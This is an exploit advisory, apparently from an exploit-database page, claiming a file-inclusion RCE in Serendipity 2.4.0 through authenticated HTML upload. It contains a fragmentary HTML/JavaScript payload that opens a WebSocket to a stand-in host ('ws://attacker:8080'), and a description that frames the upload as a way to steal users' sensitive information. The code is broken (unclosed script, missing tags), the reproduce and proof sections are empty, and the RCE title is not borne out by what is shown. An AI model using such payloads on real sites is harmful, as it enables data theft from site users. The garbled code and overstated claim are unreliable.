Serendipity 2.4.0 Exploit, File Inclusion RCE

## Exploit Title: Serendipity 2.4.0 - File Inclusion RCE
## Author: nu11secur1ty
## Date: 04.26.2023
## Vendor:
## Software:
## Reference:
## Reference:

## Description:
The already authenticated attacker can upload HTML files on the
server, which is absolutely dangerous and STUPID
In this file, the attacker can be codding a malicious web-socket
responder that can connect with some nasty webserver somewhere. It
depends on the scenario, the attacker can steal every day very
sensitive information, for a very long period of time, until the other
users will know that something is not ok with this system, and they
decide to stop using her, but maybe they will be too late for this

STATUS: HIGH Vulnerability

<!DOCTYPE html>
	<meta charset="utf-8">
	<title>NodeJS WebSocket Server</title>
	<h1>You have just sent a message to your attacker,<br>
	<h1>that you are already connected to him.</h1>
const ws = new WebSocket("ws://attacker:8080");
ws.addEventListener("open", () =>{
  console.log("We are connected to you");
  ws.send("How are you, dear :)?");

ws.addEventListener('message', function (event) {


## Reproduce:

## Proof and Exploit:

## Time spend:

System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at and
0day Exploit DataBase
home page:
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=nu11secur1ty <>

All rights reserved 2009 - 2023
Powered by: MVCP 2.0-RC / BVCP / ASPF-MILTER / PHP 7.4 / NGINX / FreeBSD